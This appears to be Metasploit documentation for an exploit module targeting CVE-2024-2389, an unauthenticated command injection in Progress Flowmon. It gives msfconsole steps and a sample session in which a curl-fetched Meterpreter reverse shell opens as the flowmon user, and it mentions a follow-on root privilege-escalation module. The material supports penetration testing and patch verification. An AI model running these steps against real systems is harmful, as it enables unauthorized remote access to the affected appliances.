## Vulnerable Application
CVE-2024-2389: Progress Flowmon Unauthenticated Command Injection

For more details on the vulnerability:
https://rhinosecuritylabs.com/research/cve-2024-2389-in-progress-flowmon/

https://support.kemptechnologies.com/hc/en-us/articles/24878235038733-CVE-2024-2389-Flowmon-critical-security-vulnerability

This application is available in cloud marketplaces:
- https://portal.azure.com/#view/Microsoft_Azure_Marketplace/GalleryItemDetailsBladeNopdl/id/progresssoftwarecorporation.flowmon
- https://aws.amazon.com/marketplace/pp/prodview-6phnrhkekuzka
- https://console.cloud.google.com/marketplace/product/flowmon-public/flowmon-collector-for-google-cloud


## Verification Steps
1. Install the application
1. Start msfconsole
1. Do: `use exploits/linux/http/progress_flowmon_unauth_cmd_injection`
1. Do: `set RHOSTS <target flowmon>`
1. Do: `set RPORT <port flowmon is running on>`
1. Do: `set LHOST <your host IP>`
1. Do: `run`
1. You should get a shell as the `flowmon` user.
1. (Optional) use the module `exploit/linux/local/progress_flowmon_sudo_privesc_2024` to gain root privileges.

## Scenarios

### Progress Flowmon 12.2

```
msf exploit(linux/http/progress_flowmon_unauth_cmd_injection) > show options

Module options (exploit/linux/http/progress_flowmon_unauth_cmd_injection):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PRIVESC    true             yes       Automatically try privesc to add sudo entry
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     172.174.209.101  yes       The target host(s), see https://docs.metasploit.com/docs/using-meta sploit/basics/using-metasploit.html
   RPORT      443              yes       The target port (TCP)
   SSL        true             no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The URI path to Flowmon
   VHOST                       no        HTTP server virtual host


Payload options (cmd/linux/http/x64/meterpreter_reverse_tcp):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   FETCH_COMMAND       CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP
                                                  , WGET)
   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
   FETCH_FILENAME      TkHAXYbQwlH      no        Name to use on remote system when storing payload; cannot contain spaces or slashes
   FETCH_SRVHOST                        no        Local IP to use for serving payload
   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
   FETCH_URIPATH                        no        Local URI to use for serving payload
   FETCH_WRITABLE_DIR                   yes       Remote writable dir to store payload; cannot contain space
                                                  s
   LHOST               138.111.211.11   yes       The listen address (an interface may be specified)
   LPORT               4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic



View the full module info with the info, or info -d command.

msf exploit(linux/http/flowmon_unauth_cmd_injection) > run

[*] Started reverse TCP handler on 138.111.211.11:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 172.174.209.101:443 can be exploited!
[*] Detected version: 12.02.06
[+] The target is vulnerable. Version 12.02.06 is vulnerable.
[*] Attempting to execute payload...
[*] Meterpreter session 1 opened (138.111.211.11:4444 -> 172.174.209.101:48856) at 2024-05-01 15:22:24 +0000

meterpreter > sysinfo
Computer     : flowmon.my3m4o21xjze5fomtxp5e53h2h.bx.internal.cloudapp.net
OS           : CentOS 7.9.2009 (Linux 3.10.0-1160.76.1.el7.flowmon.x86_64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: flowmon
```
